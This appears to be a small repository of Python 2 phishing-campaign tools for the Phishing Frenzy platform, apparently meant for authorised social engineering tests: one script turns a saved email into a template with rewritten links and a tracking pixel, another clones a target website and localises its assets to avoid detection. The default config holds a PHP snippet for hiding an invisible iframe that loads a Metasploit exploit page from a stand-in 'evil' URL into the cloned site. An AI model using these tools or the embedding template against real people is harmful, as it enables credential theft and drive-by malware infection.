├── .gitignore
├── README.md
├── config
└── website_cloner.default
├── eml_to_html.py
└── website_cloner.py
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | .project
3 | .pydevproject
4 | *.pyc
5 | *.cfg
6 | *.config
7 | *.bak
8 | /output/*
9 | /tmp/*
10 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | phishing-tools
2 | =======
3 |
4 | Scripts to assist in generating social engineering campaigns using the
5 | phishing frenzy social engineering tool.
6 |
7 | -------------------------------------------------------------------------------
8 | Matthew C. Jones, CPA, CISA, OSCP
9 |
10 | IS Audits and Consulting, LLC -
11 |
12 | TJS Deemer Dana -
13 |
14 | -------------------------------------------------------------------------------
15 | ### eml_to_html.py
16 | Converts an email in .eml format into html suitable for
17 | importing into a phishing frenzy campaign. Provides options to replace all links
18 | with phishing frenzy URL tags as well as imbedding the tracking image tag. Also
19 | provides the option to download all linked html images to local and replace
20 | those links, which is useful in the event that the internet links become broken.
21 | Output is in the .erb format which should be uploaded as the "email" with any
22 | additional images being uploaded as "attachments."
23 |
24 |
25 | ### website_cloner.py
26 | Scrapes a website and downloads all content, including
27 | images to a local folder in a format suitable for uploading into a phishing
28 | frenzy campaign. Also downloads all linked images, css, etc locally in case
29 | internet links become broken. This practice also reduces the chance of the
30 | site being detected as having been cloned by the original site owner since you
31 | are not leeching images off the original site. Output is an index.php file
32 | and any additional images, css, etc which should all be uploaded as "website."
33 |
34 | Note that some manual cleanup is required to make sure that the linked css and
35 | scripts are referencing properly. Also note that not all of the scripts downloaded
36 | will be necessary for the proper functionality of the site and may have tracking
37 | content in them.
38 |
39 | -------------------------------------------------------------------------------
40 | ### Other notes
41 |
42 | These scripts are a work in process, particularly the website_cloner - each time
43 | we use it on a new site there is some small nuance or tweak that we figure out.
44 | Please feel free to submit suggestions, modifications, or pull requests to us.
45 | Community contribution is greatly appreciated!
46 |
47 | Phishing Frenzy can be downloaded at
48 |
49 | -------------------------------------------------------------------------------
50 |
51 | ### License
52 |
53 | When not otherwise specified, scripts are licensed under GPL:
54 |
55 | This program is free software: you can redistribute it and/or modify it under
56 | the terms of the GNU General Public License as published by the Free Software
57 | Foundation, either version 3 of the License, or (at your option) any later
58 | version.
59 |
60 | This program is distributed in the hope that it will be useful, but WITHOUT ANY
61 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
62 | PARTICULAR PURPOSE. See the GNU General Public License for more details.
63 |
64 | You should have received a copy of the GNU General Public License along with
65 | this program. If not, see .
--------------------------------------------------------------------------------
/config/website_cloner.default:
--------------------------------------------------------------------------------
1 | [general]
2 | working_dir = output/
3 |
4 | ################################################################################
5 | # The HTML section below allows the user to specify additional HTML code that
6 | # should be inserted in the head and body of the html page. The example below
7 | # adds php code to imbed an invisible iframe containing executable code like
8 | # a meterpreter java applet
9 | #
10 | # NOTE - in order for the config parser to correctly parse multi line values,
11 | # they must be indented with a tab or space (even a blank line must start with
12 | # a tab or space.
13 | #
14 | # If you get a parsing error that looks like this with \n at the end of the
15 | # error lines, that is likely the problem:
16 | #
17 | # ParsingError: File contains parsing errors: config/website_cloner.config
18 | # [line 12]: '}\n'
19 | ################################################################################
20 |
21 | [html]
22 |
23 | header_text:
24 |
25 | //code for imbedding msf exploit page; imbedded text is inserted in html body
26 | $use_msf = true;
27 | $msf_url = 'https://path/to/my/evil/exploit/page/index.html';
28 | if ($use_msf == true){
29 | $msf_imbed = '';
30 | }
31 | ?>
32 |
33 | body_text:
34 | echo $msf_imbed ?>
--------------------------------------------------------------------------------
/eml_to_html.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | '''
4 | @author: Matthew C. Jones, CPA, CISA, OSCP
5 | IS Audits & Consulting, LLC
6 | TJS Deemer Dana LLP
7 |
8 | Parses an .eml file into separate files suitable for use with phishing frenzy
9 | '''
10 |
11 | import sys
12 | import argparse
13 | import email
14 | import os
15 | from BeautifulSoup import BeautifulSoup
16 | import urllib
17 |
18 | # encoding=utf8
19 | reload(sys)
20 | sys.setdefaultencoding('utf8')
21 |
22 | def main(argv):
23 |
24 | parser = argparse.ArgumentParser(description='Convert an .eml file into an html file suitable for use with phishing frenzy.')
25 | parser.add_argument("infile", action="store", help="Input file")
26 |
27 | args = parser.parse_args()
28 |
29 | inputfile = open(args.infile, "rb")
30 |
31 | #See if this will be used for phishing frenzy or as a standalone attack
32 | #Yes option will use phishing-frenzy tags and check for additional options
33 | global phishing_frenzy
34 | phishing_frenzy = False
35 | global replace_links
36 | replace_links = False
37 | global imbed_tracker
38 | imbed_tracker = False
39 |
40 | phishing_frenzy = raw_input("\nShould links and images be formatted for use in phishing frenzy? [yes]")
41 | if not ("n" in phishing_frenzy or "N" in phishing_frenzy):
42 | phishing_frenzy = True
43 | replace_links = raw_input("\nWould you like to replace all links with phishing-frenzy tags? [yes]")
44 | if not ("n" in replace_links or "N" in replace_links):
45 | replace_links = True
46 | imbed_tracker = raw_input("\nWould you like to imbed the phishing-frenzy tracking image tag? [yes]")
47 | if not ("n" in imbed_tracker or "N" in imbed_tracker):
48 | imbed_tracker = True
49 |
50 | #change working directory so we are in same directory as input file!
51 | os.chdir(os.path.dirname(inputfile.name))
52 |
53 | message = email.message_from_file(inputfile)
54 |
55 | extract_payloads(message)
56 |
57 |
58 | def extract_payloads(msg):
59 | if msg.is_multipart():
60 | #message / section is multi-part; loop part back through the extraction module
61 | print "Multi-part section encountered; extracting individual parts from section..."
62 | for part in msg.get_payload():
63 | extract_payloads(part)
64 | else:
65 | sectionText=msg.get_payload(decode=True)
66 | contentType=msg.get_content_type()
67 | filename=msg.get_filename() #this is the filename of an attachment
68 |
69 | #sectionText = sectionText.encode('utf-8').decode('ascii', 'ignore')
70 | soup = BeautifulSoup(sectionText)
71 |
72 | if contentType=="text/html":
73 | print "Processing HTML section..."
74 |
75 | ########################################
76 | #replace links with phishing frenzy tags
77 | ########################################
78 | if replace_links==True:
79 | for a in soup.findAll('a'):
80 | a['href'] = '<%= @url %>'
81 |
82 | ###############################################
83 | #Detect hyperlinked images and download locally
84 | ###############################################
85 | imageList = []
86 |
87 | for tag in soup.findAll('img', src=True):
88 | imageList.append(tag['src'])
89 |
90 | if not imageList:
91 | pass
92 | else:
93 | print "The following linked images were detected in the HTML:"
94 | for url in imageList:
95 | print url
96 |
97 | download_images = raw_input("\nWould you like to download these and store locally? [yes]")
98 |
99 | if not ("n" in download_images or "N" in download_images):
100 | print "Downloading images..."
101 | for url in imageList:
102 | try:
103 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
104 | open(filename,"wb").write(urllib.urlopen(url).read())
105 |
106 | #Does not appear that using PF attachment tag is necessary; just use filename?!?
107 | if phishing_frenzy==True:
108 | pass
109 | #filename = "<%= image_tag attachments['"+filename+"'].url %>"
110 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
111 | except:
112 | print "Error processing " + url + " - skipping..."
113 |
114 | if imbed_tracker == True:
115 | soup.body.insert(len(soup.body.contents), '
')
116 |
117 | ##########################################
118 | #Clean up html output and make it readable
119 | ##########################################
120 | sectionText = soup.prettify()
121 | sectionText = sectionText.replace('<','<')
122 | sectionText = sectionText.replace('>','>')
123 |
124 | print sectionText
125 |
126 | if phishing_frenzy==True:
127 | export_part(sectionText,"email.html.erb")
128 | else:
129 | export_part(sectionText,"email.html")
130 |
131 | elif contentType=="text/plain":
132 | ##TODO: Need to fix link cleanup of text section; beautiful soup doesn't replace hyperlinks in text file!
133 | print "Processing text section..."
134 |
135 | if phishing_frenzy==True:
136 | export_part(sectionText,"email.txt.erb")
137 | else:
138 | export_part(sectionText,"email.txt")
139 |
140 | elif filename:
141 | print "Processing attachment "+filename+"..."
142 | export_part(sectionText,filename)
143 | else:
144 | print "section is of unknown type ("+str(contentType)+")...skipping..."
145 |
146 |
147 | def export_part(sectionText,filename):
148 | open(filename,"wb").write(sectionText)
149 |
150 |
151 | if __name__ == "__main__":
152 | main(sys.argv[1:])
153 |
--------------------------------------------------------------------------------
/website_cloner.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | '''
4 | @author: Matthew C. Jones, CPA, CISA, OSCP
5 | IS Audits & Consulting, LLC
6 | TJS Deemer Dana LLP
7 |
8 | Downloads a website into a format suitable for use with phishing frenzy
9 | '''
10 |
11 | import sys
12 | import argparse
13 | import os
14 | import shutil
15 | from BeautifulSoup import BeautifulSoup, NavigableString
16 | import urllib2
17 | import ConfigParser
18 |
19 | def main(argv):
20 |
21 | parser = argparse.ArgumentParser(description='Downloads a website into a format suitable for use with phishing frenzy')
22 | parser.add_argument("site_addr", action="store", help="Site address")
23 |
24 | args = parser.parse_args()
25 | site_addr = args.site_addr
26 |
27 | #########################################
28 | #Get stuff from config file
29 | #########################################
30 | config_file = "config/website_cloner.config"
31 | if os.path.exists(config_file):
32 | pass
33 | else:
34 | try:
35 | print "Specified config file not found. Copying example config file..."
36 | shutil.copyfile("config/website_cloner.default", config_file)
37 | except:
38 | print "Error copying default config file...quitting execution..."
39 | sys.exit()
40 |
41 | config = ConfigParser.SafeConfigParser()
42 | config.read(config_file)
43 |
44 | try:
45 | working_dir = config.get("general", "working_dir")
46 | header_text = config.get("html", "header_text")
47 | body_text = config.get("html", "body_text")
48 |
49 | except:
50 | print "Missing required config file sections. Check running config file against provided example\n"
51 | sys.exit()
52 |
53 | site_path = site_addr.replace("http://","")
54 | site_path = site_path.replace("https://","")
55 | working_dir = os.path.join(working_dir, site_path,'')
56 | if not os.path.exists(working_dir):
57 | os.makedirs(working_dir)
58 |
59 | os.chdir(os.path.dirname(working_dir))
60 |
61 | #########################################
62 | #Get the site we are cloning
63 | #########################################
64 |
65 | if not site_addr[:4] == "http":
66 | site_addr = "http://"+site_addr
67 |
68 | try:
69 | site_text=urllib2.urlopen(site_addr).read()
70 | except:
71 | print "Could not open site...quitting..."
72 | sys.exit()
73 |
74 | #soup=BeautifulSoup(header_text+site_text)
75 | soup=BeautifulSoup(site_text)
76 | head=soup.find('head')
77 | head.insert(0,NavigableString(header_text))
78 | body=soup.find('body')
79 | body.insert(0,NavigableString(body_text))
80 |
81 | ###############################################
82 | #Detect hyperlinked images and download locally
83 | ###############################################
84 | imageList = []
85 |
86 | for tag in soup.findAll('img', src=True):
87 | imageList.append(tag['src'])
88 |
89 | if not imageList:
90 | pass
91 | else:
92 | for url in imageList:
93 | try:
94 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
95 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
96 |
97 | if not url.startswith('http'):
98 | url = urllib2.urlparse.urljoin(site_addr,url)
99 | print "getting " + url + "..."
100 |
101 | open(filename,"wb").write(urllib2.urlopen(url, timeout=5).read())
102 | except:
103 | pass
104 |
105 | cssList = []
106 |
107 | for tag in soup.findAll('link', {'rel':'stylesheet'}):
108 | cssList.append(tag['href'])
109 |
110 | if not cssList:
111 | pass
112 | else:
113 | for url in cssList:
114 | try:
115 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
116 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
117 |
118 | if not url.startswith('http'):
119 | url = urllib2.urlparse.urljoin(site_addr,url)
120 | print "getting " + url + "..."
121 |
122 | open(filename,"wb").write(urllib2.urlopen(url, timeout=5).read())
123 | except:
124 | pass
125 |
126 | scriptList = []
127 |
128 | for tag in soup.findAll('script', src=True):
129 | scriptList.append(tag['src'])
130 |
131 | if not scriptList:
132 | pass
133 | else:
134 | for url in scriptList:
135 | try:
136 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
137 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
138 |
139 | if not url.startswith('http'):
140 | url = urllib2.urlparse.urljoin(site_addr,url)
141 | print "getting " + url + "..."
142 |
143 | open(filename,"wb").write(urllib2.urlopen(url, timeout=5).read())
144 | except:
145 | pass
146 |
147 | ##########################################
148 | #Clean up html output and make it readable
149 | ##########################################
150 | mainpage = soup.prettify()
151 | mainpage = mainpage.replace('<','<')
152 | mainpage = mainpage.replace('>','>')
153 |
154 | open("index.php","wb").write(mainpage)
155 |
156 | if __name__ == "__main__":
157 | main(sys.argv[1:])
158 |
--------------------------------------------------------------------------------